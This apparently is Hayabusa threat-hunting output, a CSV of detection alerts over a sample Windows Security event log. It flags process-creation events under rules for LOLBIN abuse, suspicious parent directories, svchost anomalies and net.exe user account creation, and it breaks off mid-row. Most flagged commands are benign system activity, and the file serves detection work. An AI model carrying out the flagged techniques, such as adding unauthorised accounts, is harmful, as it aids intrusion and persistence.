LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xd58 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:55:29.358 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-system.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x8dc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:55:29.420 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-system.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x748 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:56:17.432 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1788 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:56:17.468 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x8e4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:56:42.015 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe70 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:56:42.074 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xfd4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:59:41.893 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xfac | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:59:41.954 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1798 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 19:00:08.701 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x14ac | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 19:00:08.738 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1708 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 19:00:25.559 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xf80 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 19:00:25.615 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x2a4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 19:00:45.207 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x298 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 19:00:45.252 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf44 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 19:02:16.930 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x4cc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 19:02:16.995 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1520 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 19:03:18.080 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11fc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 19:03:18.108 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xaac | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 19:06:17.300 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 20:07:47.341 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 20:48:41.903 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13b8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 20:49:01.091 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14c8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 20:50:48.340 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 20:51:10.630 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x10f8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 21:03:24.509 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 22:05:29.521 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 23:02:21.533 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 00:06:39.541 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 00:09:04.159 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x1064 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 00:09:04.174 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb50 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 00:11:15.295 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 00:11:16.100 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x1264 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 00:11:16.210 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1694 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 00:11:29.568 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 00:11:35.821 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1300 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 00:12:06.943 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 00:12:06.951 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1128 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 15:54:06.387 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 15:54:06.516 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x1100 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 15:54:07.003 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 15:54:07.012 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13f8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 15:54:07.725 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 15:54:07.802 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1744 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 15:54:09.426 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x1464 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 15:54:28.302 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17bc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 16:08:04.274 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 16:12:27.928 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1274 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 16:12:27.973 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x8d0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 16:18:44.431 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1044 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 16:18:44.458 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x16d4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 17:01:48.411 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 17:01:48.594 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x1728 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 17:01:48.666 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xc08 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 17:03:48.398 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x14b8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 17:03:48.398 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 17:03:48.588 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 17:03:52.725 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 17:03:52.725 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 17:08:59.282 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 17:09:30.260 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdb4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 17:09:39.134 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 17:10:01.474 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1720 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 17:26:02.115 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xb0c | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 18:11:43.289 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 19:13:56.326 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 19:43:52.367 +00:00,IE10Win7,4688,medium,Persis,Net.exe User Account Creation,,rules/sigma/process_creation_builtin/proc_creation_win_net_user_add.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 19:43:52.367 +00:00,IE10Win7,4688,low,Disc | LatMov,Net.exe 